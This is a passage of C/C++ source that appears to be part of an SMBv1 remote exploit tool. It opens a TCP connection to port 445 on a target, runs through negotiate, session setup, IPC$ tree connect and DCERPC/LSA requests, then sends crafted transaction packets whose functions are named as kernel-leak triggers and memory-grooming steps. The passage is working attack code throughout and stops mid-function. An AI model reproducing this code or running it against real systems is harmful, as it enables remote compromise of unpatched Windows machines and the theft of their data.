22 | if (notnull(GetModuleHandleW(TEXT("ws2_32"))))
23 | {
24 | wsockdll = GetModuleHandleW(TEXT("ws2_32"));
25 | }
26 | else
27 | {
28 | wsockdll = LoadLibraryW(TEXT("ws2_32.dll"));
29 | }
30 |
31 | if (isnull(wsockdll))
32 | return STATUS_INVALID_HANDLE;
33 | else
34 | pinet_addr = (PFN_INET_ADDR)GetProcAddress(wsockdll, "inet_addr");
35 |
36 | if (isnull(pinet_addr))
37 | ExitProcess(STATUS_INVALID_HANDLE);
38 | else
39 | sa.sin_addr.s_addr = pinet_addr(targetip);
40 | sa.sin_family = AF_INET;
41 | sa.sin_port = htons(445);
42 |
43 | s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
44 |
45 | if (validsock(s))
46 | {
47 | status = connect(s, (sockaddr*)&sa, sizeof(sa));
48 | if (issockerr(status))
49 | {
50 | #ifdef _DEBUG
51 | fwprintf_s(stderr, TEXT("[%ws]:\t error 0x%08x occured when calling \"%ws\"\n"), __FUNCTIONW__, STATUS_FAIL, L"connect()");
52 | (VOID)SleepEx(2000, FALSE);
53 | ExitProcess(STATUS_FAIL);
54 | #else
55 | return MAKEUNSIGNED(STATUS_FAIL);
56 | #endif //_DEBUG
57 | }
58 | else
59 | {
60 | *(&status) &= 0;
61 | status = 0;
62 | return 0;
63 | }
64 |
65 | }
66 | else
67 | {
68 | return MAKEUNSIGNED(WSAGetLastError());
69 | }
70 |
71 | return STATUS_FAIL;
72 |
73 | }
74 |
75 | unsigned int SendData(BUFFER IN OUT* bws, SOCKET& s, unsigned int& status)
76 | {
77 | status = 0;
78 |
79 | if (badsock(s))
80 | return MAKEUNSIGNED(WSAGetLastError());
81 |
82 | *(int*)(&status) = send(s, (const char*)bws->pbdata, *(int*)(&bws->dwsize), 0);
83 | return status;
84 | }
85 |
86 | unsigned int RecvData(BUFFER IN OUT* bws, DWORD IN bufsize, SOCKET& s, unsigned int& status)
87 | {
88 | bwsalloc(bws, bufsize);
89 |
90 | if (badsock(s))
91 | return MAKEUNSIGNED(WSAGetLastError());
92 |
93 | *(int*)(&status) = recv(s, (char*)bws->pbdata, *(int*)(&bws->dwsize), 0);
94 | return status;
95 | }
96 | */
97 |
98 | BOOLEAN SendRecvNegotiate(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info)
99 | {
100 | unsigned int sendstatus = 0, & recievestatus = sendstatus;
101 | BUFFER* srv = (&outbound->ThisPacket), * client = (&inbound->ThisPacket), tmp = { 0 };
102 |
103 | //attempt to make nego request packet fail if it fails
104 | if (isnull(negotiate_request_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
105 | {
106 | errmsg(__FUNCSIG__, __LINE__, STATUS_NO_MEMORY);
107 | return FALSE;
108 | }
109 |
110 | // exit loop if socket is invalid
111 | while (validsock(s))
112 | {
113 | //send request
114 | PutUlong(&sendstatus, SendData(srv, s, sendstatus));
115 |
116 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + 4);
117 | outbound->ThisNetbiosSize = srv->pbdata + sizeof(WORD);
118 |
119 | if (issockerr(sendstatus) || badsock(s) || ((sendstatus & STATUS_FAIL) == STATUS_FAIL))
120 | {
121 | sendstatus = STATUS_FAIL;
122 | break;
123 | }
124 |
125 | //recv response
126 | PutUlong(&recievestatus, RecvData(client, 0x200, s, recievestatus));
127 |
128 | bwsalloc(&tmp, recievestatus);
129 | cpy(tmp.pbdata, inbound->ThisPacket.pbdata, tmp.dwsize);
130 | bwsfree(&inbound->ThisPacket);
131 | bwsalloc(&inbound->ThisPacket, tmp.dwsize);
132 | cpy(inbound->ThisPacket.pbdata, tmp.pbdata, inbound->ThisPacket.dwsize);
133 | bwsfree(&tmp);
134 |
135 | inbound->ThisSmb = MAKEPSMB(srv->pbdata + 4);
136 | inbound->ThisNetbiosSize = srv->pbdata + 2;
137 | outbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
138 | outbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
139 |
140 | if (issockerr(recievestatus))
141 | {
142 | sendstatus = STATUS_FAIL;
143 | break;
144 | }
145 | else
146 | {
147 | return TRUE;
148 | }
149 | }
150 |
151 | if (sendstatus == STATUS_FAIL)
152 | {
153 | goto cleanup;
154 | }
155 |
156 |
157 |
158 | cleanup:
159 | if (validsock(s))
160 | closesocket(s);
161 | s = INVALID_SOCKET;
162 | WSACleanup();
163 | if (notnull(client->pbdata))
164 | bwsfree(client);
165 | if (notnull(srv->pbdata))
166 | bwsfree(srv);
167 | return FALSE;
168 | }
169 |
170 | BOOLEAN SendRecvSessionSetupAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info)
171 | {
172 | unsigned int sendstatus[2] = { 0 }, & recievestatus = *sendstatus;
173 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
174 | BOOLEAN retval = 0;
175 |
176 | if (isnull(outbound) || isnull(inbound) || isnull(info))
177 | {
178 | SetLastError(STATUS_INVALID_PARAMETER);
179 | //errmsg(__FUNCTION__, __LINE__, GetLastError());
180 | return FALSE;
181 | }
182 |
183 | if (badsock(s))
184 | return FALSE;
185 |
186 | if (isnull(session_setup_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
187 | {
188 | errmsg(__FUNCSIG__, __LINE__, STATUS_NO_MEMORY);
189 | return FALSE;
190 | }
191 |
192 | PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));
193 |
194 | if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
195 | return FALSE;
196 |
197 | PutUnsigned(&recievestatus, RecvData(client, 0x200, s, GetUnsigned(sendstatus + 1)));
198 |
199 | if (!GetUlong(&recievestatus) || issockerr(GetUlong(&recievestatus)))
200 | return FALSE;
201 |
202 | bwsalloc(&tmp, GetUlong(&recievestatus));
203 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
204 | bwsfree(client);
205 |
206 | bwsalloc(client, tmp.dwsize);
207 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
208 | bwsfree(&tmp);
209 |
210 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
211 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
212 | inbound->ThisNetbiosSize = MAKEPBYTE(client->pbdata + NETBIOS_SIZE_OFFSET);
213 | outbound->ThisNetbiosSize = MAKEPBYTE(srv->pbdata + NETBIOS_SIZE_OFFSET);
214 |
215 | return TRUE;
216 | }
217 |
218 | BOOLEAN SendRecvTreeConnectAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info, PCWSTR IN ip)
219 | {
220 | static unsigned int sendsize[2], recvsize[2];
221 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
222 | static UNICODE_STRING wstring, unc; static PWSTR unicodeiptmp;
223 | WCHAR psztmp[0x100] = { 0 };
224 | static DWORD i;
225 | BYTE iparray[4] = { 0 };
226 |
227 | unicodeiptmp = MAKEPWSTR(psztmp);
228 |
229 | wsprintfW(unicodeiptmp, L"\\\\%ws\\IPC$", ip);
230 | InitUnicodeString(unicodeiptmp, &unc);
231 |
232 |
233 | if (isnull(tree_connect_packet(srv, &unc, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
234 | {
235 | FreeUnicodeString(&unc);
236 | return FALSE;
237 | }
238 |
239 |
240 |
241 | PutUlong(sendsize, SendData(srv, s, sendsize[1]));
242 |
243 | PutUlong(recvsize, RecvData(client, 0x300, s, recvsize[1]));
244 |
245 | if (!cmp(srv->pbdata + 4, "\xFFSMB", 4))
246 | return FALSE;
247 | if (!cmp(client->pbdata + 4, "\xFFSMB", 4))
248 | return FALSE;
249 |
250 | bwsalloc(&tmp, GetUlong(recvsize));
251 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
252 | bwsfree(client);
253 | bwsalloc(client, tmp.dwsize);
254 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
255 | bwsfree(&tmp);
256 |
257 | inbound->ThisNetbiosSize = MAKEPBYTE(inbound->ThisPacket.pbdata + sizeof(WORD));
258 | outbound->ThisNetbiosSize = MAKEPBYTE(outbound->ThisPacket.pbdata + sizeof(WORD));
259 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + 4);
260 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + 4);
261 |
262 | if (inbound->ThisSmb->Status.NtStatus & STATUS_FAIL)
263 | return FALSE;
264 | else
265 | return TRUE;
266 | }
267 |
268 | BOOLEAN SendRecvNtCreateAndx(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info)
269 | {
270 | #pragma warning(push)
271 | #pragma warning(disable : 28182)
272 | BUFFER* client = &inbound->ThisPacket, * srv = &outbound->ThisPacket, tmp = { 0 };
273 | unsigned int sendstatus = 0, recvstatus = 0;
274 |
275 | if (badsock(s) || isnull(info))
276 | return FALSE;
277 |
278 | if (isnull(nt_create_andx_packet(srv, byteswap16(0), get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
279 | return FALSE;
280 |
281 | PutUlong(&sendstatus, SendData(srv, s, sendstatus));
282 |
283 | if (sendstatus == 0 || issockerr(sendstatus))
284 | return FALSE;
285 |
286 | PutUlong(&recvstatus, RecvData(client, 0x200, s, recvstatus));
287 |
288 | if (recvstatus == 0 || issockerr(recvstatus))
289 | return FALSE;
290 |
291 | if (notnull(inbound->ThisPacket.pbdata))
292 | {
293 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + 4);
294 | if (inbound->ThisSmb->Status.NtStatus == 0)
295 | {
296 | PRESP_NT_CREATE_ANDX presp = (PRESP_NT_CREATE_ANDX)(inbound->ThisPacket.pbdata + 36);
297 | set_fid(info, presp->Fid);
298 | }
299 | else
300 | {
301 | set_fid(info, 0);
302 | }
303 | }
304 |
305 | bwsalloc(&tmp, GetUlong(&recvstatus));
306 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
307 | bwsfree(client);
308 |
309 | bwsalloc(client, tmp.dwsize);
310 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
311 | bwsfree(&tmp);
312 |
313 |
314 | inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
315 | outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
316 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
317 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
318 |
319 | if (!cmp(client->pbdata + 4, "\xFFSMB", 4))
320 | return FALSE;
321 |
322 | if (inbound->ThisSmb->Status.NtStatus & STATUS_FAIL)
323 | {
324 | SetLastError(GetUlong(&inbound->ThisSmb->Status.NtStatus));
325 | return FALSE;
326 | }
327 | #pragma warning(pop)
328 | return TRUE;
329 | }
330 |
331 | BOOLEAN SendRecvTransDcerpcBind(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
332 | {
333 | static unsigned int sendsize[2], recvsize[2];
334 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
335 |
336 | if (badsock(s))
337 | return FALSE;
338 |
339 | if (isnull(trans_dcerpc_bind_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
340 | return FALSE;
341 |
342 | PutUlong(sendsize, SendData(srv, s, sendsize[1]));
343 |
344 | if (badsock(s) || issockerr(GetUlong(sendsize)))
345 | return FALSE;
346 |
347 | if (!sendsize[0])
348 | {
349 | bwsfree(srv);
350 | return FALSE;
351 | }
352 |
353 | PutUlong(recvsize, RecvData(client, 0x400, s, recvsize[1]));
354 |
355 | if ((*recvsize) == 0)
356 | {
357 | bwsfree(srv);
358 | bwsfree(client);
359 | return FALSE;
360 | }
361 |
362 | if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
363 | {
364 | bwsfree(srv);
365 | bwsfree(client);
366 | return FALSE;
367 | }
368 |
369 | bwsalloc(&tmp, GetUlong(recvsize));
370 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
371 | bwsfree(client);
372 | bwsalloc(client, tmp.dwsize);
373 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
374 | bwsfree(&tmp);
375 |
376 | inbound->ThisNetbiosSize = (inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
377 | outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
378 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
379 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
380 |
381 | return TRUE;
382 | }
383 |
384 | BOOLEAN SendRecvLsaGetUsername(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
385 | {
386 | static unsigned int sendsize[2], recvsize[2];
387 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
388 |
389 | if (badsock(s))
390 | return FALSE;
391 |
392 | if (isnull(write_andx_lsarpc_getusername_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
393 | return FALSE;
394 |
395 | PutUlong(sendsize, SendData(srv, s, sendsize[1]));
396 |
397 | if (badsock(s) || issockerr(GetUlong(sendsize)))
398 | return FALSE;
399 |
400 | if (!sendsize[0])
401 | {
402 | bwsfree(srv);
403 | return FALSE;
404 | }
405 |
406 | PutUlong(recvsize, RecvData(client, 0x400, s, recvsize[1]));
407 |
408 | if ((*recvsize) == 0)
409 | {
410 | bwsfree(srv);
411 | bwsfree(client);
412 | return FALSE;
413 | }
414 |
415 | if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
416 | {
417 | bwsfree(srv);
418 | bwsfree(client);
419 | return FALSE;
420 | }
421 |
422 | bwsalloc(&tmp, GetUlong(recvsize));
423 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
424 | bwsfree(client);
425 |
426 | bwsalloc(client, tmp.dwsize);
427 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
428 | bwsfree(&tmp);
429 |
430 | inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
431 | inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
432 |
433 | outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
434 | outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
435 |
436 |
437 |
438 |
439 | return TRUE;
440 | }
441 |
442 | BOOLEAN SendRecvTransFirstLeakTrigger(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info IN* info)
443 | {
444 | static unsigned int sendsize[2], recvsize[2], * sstatus, * rstatus;
445 |
446 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 }, * leakdata = &leak->KrnlLeakResponse;
447 |
448 | if (badsock(s))
449 | return FALSE;
450 |
451 | if (isnull(outbound) || isnull(inbound) || isnull(leak) || isnull(info))
452 | {
453 | errmsg(__FUNCSIG__, __LINE__, STATUS_INVALID_PARAMETER);
454 | SetLastError(STATUS_INVALID_PARAMETER | STATUS_FAIL);
455 | return FALSE;
456 | }
457 |
458 | if (isnull(trans_trigger_first_leak_packet(srv, 10252, get_uid(info), get_mid(info), get_tid(info))))
459 | {
460 | SetLastError(STATUS_NO_MEMORY | STATUS_FAIL);
461 | return FALSE;
462 | }
463 |
464 | sstatus = sendsize;
465 | rstatus = recvsize;
466 |
467 | PutUnsigned(sstatus, SendData(srv, s, GetUnsigned(sendsize + 1)));
468 |
469 | PutUnsigned(rstatus, RecvData(client, 0x100, s, GetUnsigned(recvsize + 1)));
470 |
471 | if (isnull(*rstatus) || issockerr(*rstatus))
472 | {
473 | PutUlong(sstatus, WSAGetLastError());
474 | bwsfree(srv);
475 | bwsfree(client);
476 | SetLastError(GetUlong(sstatus));
477 | return FALSE;
478 | }
479 |
480 | if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
481 | return FALSE;
482 |
483 | bwsalloc(&tmp, GetUlong(rstatus));
484 | cpy(tmp.pbdata, inbound->ThisPacket.pbdata, tmp.dwsize);
485 | bwsfree(&inbound->ThisPacket);
486 | bwsalloc(&inbound->ThisPacket, tmp.dwsize);
487 | cpy(inbound->ThisPacket.pbdata, tmp.pbdata, inbound->ThisPacket.dwsize);
488 | bwsfree(&tmp);
489 |
490 | return TRUE;
491 | }
492 |
493 | BOOLEAN SendRecvTransGroomTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
494 | {
495 | static unsigned int sendsize[2], recvsize[2], * sstatus, * rstatus;
496 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
497 |
498 | if (badsock(s))
499 | return FALSE;
500 | if (isnull(outbound) || isnull(inbound) || isnull(info))
501 | return FALSE;
502 |
503 | sstatus = sendsize;
504 | rstatus = recvsize;
505 |
506 | if (isnull(trans_groom_type_one_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
507 | return FALSE;
508 |
509 | *sstatus = SendData(srv, s, GetUnsigned(sendsize + 1));
510 |
511 | *rstatus = RecvData(client, 0x100, s, GetUnsigned(recvsize + 1));
512 |
513 | if (isnull(*rstatus) || issockerr(*rstatus))
514 | {
515 | *sstatus = WSAGetLastError();
516 | SetLastError(GetUlong(sstatus));
517 | bwsfree(client);
518 | bwsfree(srv);
519 | return FALSE;
520 | }
521 |
522 | bwsalloc(&tmp, GetUlong(rstatus));
523 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
524 | bwsfree(client);
525 | bwsalloc(client, tmp.dwsize);
526 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
527 | bwsfree(&tmp);
528 |
529 | return TRUE;
530 | }
531 |
532 | BOOLEAN SendRecvTransFirstMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
533 | {
534 | static unsigned int sendsize[2], recvsize[2], * sstatus, * rstatus;
535 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
536 | WORD mids[] = { 75, byteswap16(64), 76 };
537 | if (badsock(s))
538 | return FALSE;
539 |
540 | if (isnull(outbound) || isnull(inbound) || isnull(info))
541 | {
542 | SetLastError(STATUS_INVALID_PARAMETER);
543 | return FALSE;
544 | }
545 |
546 | sstatus = sendsize;
547 | rstatus = recvsize;
548 |
549 | if (isnull(trans_multirequest_type_one_packet(srv, get_pid(info), get_uid(info), mids, get_tid(info))))
550 | {
551 | errmsg(__FUNCSIG__, __LINE__, STATUS_FAIL | GetLastError());
552 | return FALSE;
553 | }
554 |
555 |
556 | PutUnsigned(sstatus, SendData(srv, s, GetUnsigned(sendsize + 1)));
557 |
558 | if (!GetUlong(sstatus) || issockerr(GetUlong(sstatus)))
559 | {
560 | *sstatus = WSAGetLastError();
561 | SetLastError(GetUlong(sstatus));
562 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
563 | bwsfree(srv);
564 | return FALSE;
565 | }
566 |
567 | PutUnsigned(rstatus, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
568 |
569 | if (!GetUlong(rstatus) || issockerr(GetUlong(rstatus)))
570 | {
571 | *sstatus = WSAGetLastError();
572 | SetLastError(GetUlong(sstatus));
573 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
574 | return FALSE;
575 | }
576 |
577 | bwsalloc(&tmp, GetUlong(rstatus));
578 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
579 | bwsfree(client);
580 |
581 | bwsalloc(client, tmp.dwsize);
582 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
583 | bwsfree(&tmp);
584 |
585 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
586 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
587 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
588 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
589 |
590 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
591 | return FALSE;
592 |
593 | return TRUE;
594 | }
595 |
596 | BOOLEAN SendRecvTransSecondMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
597 | {
598 | unsigned int sstatus[2] = { 0 }, rstatus[2] = { 0 };
599 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
600 |
601 | if (isnull(outbound) || isnull(inbound) || isnull(info))
602 | {
603 | PutUlong(sstatus + 1, STATUS_INVALID_PARAMETER);
604 | SetLastError(GetUlong(sstatus + 1));
605 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
606 | return FALSE;
607 | }
608 |
609 | if (badsock(s))
610 | {
611 | PutUlong(sstatus, SOCKET_ERROR);
612 | SetLastError(GetUlong(sstatus));
613 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
614 | return FALSE;
615 | }
616 |
617 | if (isnull(trans_multirequest_type_one_number_two_packet(srv, get_pid(info), get_uid(info), NULL, get_tid(info))))
618 | {
619 | errmsg(__FUNCSIG__, __LINE__, STATUS_FAIL);
620 | return FALSE;
621 | }
622 |
623 | PutUnsigned(sstatus, SendData(srv, s, GetUnsigned(sstatus + 1)));
624 |
625 | if (isnull(*sstatus) || issockerr(*sstatus))
626 | {
627 | errmsg(__FUNCSIG__, __LINE__, WSAGetLastError());
628 | return FALSE;
629 | }
630 |
631 | PutUnsigned(rstatus, RecvData(client, 0x200, s, GetUnsigned(rstatus + 1)));
632 |
633 | if (isnull(*rstatus) || issockerr(*rstatus))
634 | {
635 | errmsg(__FUNCSIG__, __LINE__, WSAGetLastError());
636 | return FALSE;
637 | }
638 |
639 | bwsalloc(&tmp, GetUlong(rstatus));
640 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
641 | bwsfree(client);
642 |
643 | bwsalloc(client, tmp.dwsize);
644 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
645 | bwsfree(&tmp);
646 |
647 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
648 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
649 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
650 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
651 |
652 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
653 | return FALSE;
654 |
655 | return TRUE;
656 | }
657 |
658 | BOOLEAN SendRecvTransThirdMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
659 | {
660 | static unsigned int sendstatus[2], recvstatus[2];
661 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
662 | packet_creation_handler_type_one create_packet = &trans_multirequest_type_one_number_three_packet;
663 |
664 | if (isnull(outbound) || isnull(inbound) || isnull(info))
665 | return FALSE;
666 |
667 | if (badsock(s))
668 | return FALSE;
669 |
670 | if (isnull(create_packet))
671 | return FALSE;
672 |
673 | if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
674 | return FALSE;
675 |
676 | PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));
677 |
678 | if (issockerr(GetUlong(sendstatus)) || !GetUlong(sendstatus))
679 | return FALSE;
680 |
681 | PutUnsigned(recvstatus, RecvData(client, 0x400, s, GetUnsigned(recvstatus + 1)));
682 |
683 | if (issockerr(GetUlong(recvstatus)) || !GetUlong(recvstatus))
684 | return FALSE;
685 |
686 | bwsalloc(&tmp, GetUlong(recvstatus));
687 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
688 | bwsfree(client);
689 |
690 | bwsalloc(client, tmp.dwsize);
691 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
692 | bwsfree(&tmp);
693 |
694 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
695 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
696 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
697 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
698 |
699 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
700 | return FALSE;
701 |
702 | return TRUE;
703 | }
704 |
705 | BOOLEAN SendRecvTransGroomTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
706 | {
707 | unsigned sendsize[2] = { 0 }, recvsize[2] = { 0 }, * rstatus = recvsize, * sstatus = sendsize;
708 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
709 |
710 | if (isnull(outbound) || isnull(inbound) || isnull(info))
711 | {
712 | PutUlong(sstatus + 1, STATUS_INVALID_PARAMETER);
713 | SetLastError(GetUlong(sstatus + 1));
714 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
715 | return FALSE;
716 | }
717 |
718 | if (badsock(s))
719 | {
720 | PutUlong(sstatus, SOCKET_ERROR);
721 | SetLastError(GetUlong(sstatus));
722 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
723 | return FALSE;
724 | }
725 |
726 | if (isnull(trans_groom_type_two_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
727 | {
728 | SetLastError(STATUS_FAIL);
729 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
730 | return FALSE;
731 | }
732 |
733 | PutUlong(sstatus, SendData(srv, s, GetUnsigned(sendsize + 1)));
734 |
735 | if (isnull(GetUlong(sstatus)) || issockerr(GetUlong(sstatus)))
736 | {
737 | PutUnsigned(sendsize + 1, WSAGetLastError());
738 | SetLastError(GetUlong(sendsize + 1));
739 | errmsg(__FUNCSIG__, __LINE__, GetUlong(sendsize + 1));
740 | return FALSE;
741 | }
742 |
743 | PutUlong(rstatus, RecvData(client, 0x400, s, GetUnsigned(rstatus + 1)));
744 |
745 | if (isnull(GetUlong(rstatus)) || issockerr(GetUlong(rstatus)))
746 | {
747 | PutUnsigned(recvsize + 1, WSAGetLastError());
748 | SetLastError(GetUlong(recvsize + 1));
749 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
750 | return FALSE;
751 | }
752 |
753 | bwsalloc(&tmp, GetUlong(rstatus));
754 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
755 | bwsfree(client);
756 |
757 | bwsalloc(client, tmp.dwsize);
758 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
759 | bwsfree(&tmp);
760 |
761 | if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
762 | return FALSE;
763 | else
764 | return TRUE;
765 | }
766 |
767 | BOOLEAN SendRecvTransSecondarySecondLeakTrigger(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info IN* info)
768 | {
769 | static unsigned int sendsize[2], recvsize[2], * sstatus, * rstatus;
770 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, * leakbws = &leak->KrnlLeakResponse, tmp = { 0 };
771 | static WORD pid, mid;
772 | PRESP_TRANSACTION transresp = NULL;
773 |
774 | PutUshort(&pid, 10252);
775 | PutUshort(&mid, 75);
776 | // mid = ((get_mid(info) == 75) ? get_mid(info) : get_special_mid(info));
777 |
778 | if (isnull(outbound) || isnull(inbound) || isnull(info) || isnull(leak))
779 | {
780 | PutUlong(sstatus + 1, STATUS_INVALID_PARAMETER);
781 | SetLastError(GetUlong(sstatus + 1));
782 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
783 | return FALSE;
784 | }
785 |
786 | if (badsock(s))
787 | {
788 | PutUlong(sstatus, SOCKET_ERROR);
789 | SetLastError(GetUlong(sstatus));
790 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
791 | return FALSE;
792 | }
793 |
794 | rstatus = recvsize;
795 | sstatus = sendsize;
796 |
797 | if (isnull(trans_secondary_trigger_second_leak_packet(srv, pid, get_uid(info), mid, get_tid(info))))
798 | {
799 | errmsg(__FUNCSIG__, __LINE__, GetLastError());
800 | return FALSE;
801 | }
802 |
803 | PutUnsigned(sstatus, SendData(srv, s, GetUnsigned(sendsize + 1)));
804 |
805 | if (!GetUlong(sstatus) || issockerr(GetUlong(sstatus)))
806 | return FALSE;
807 |
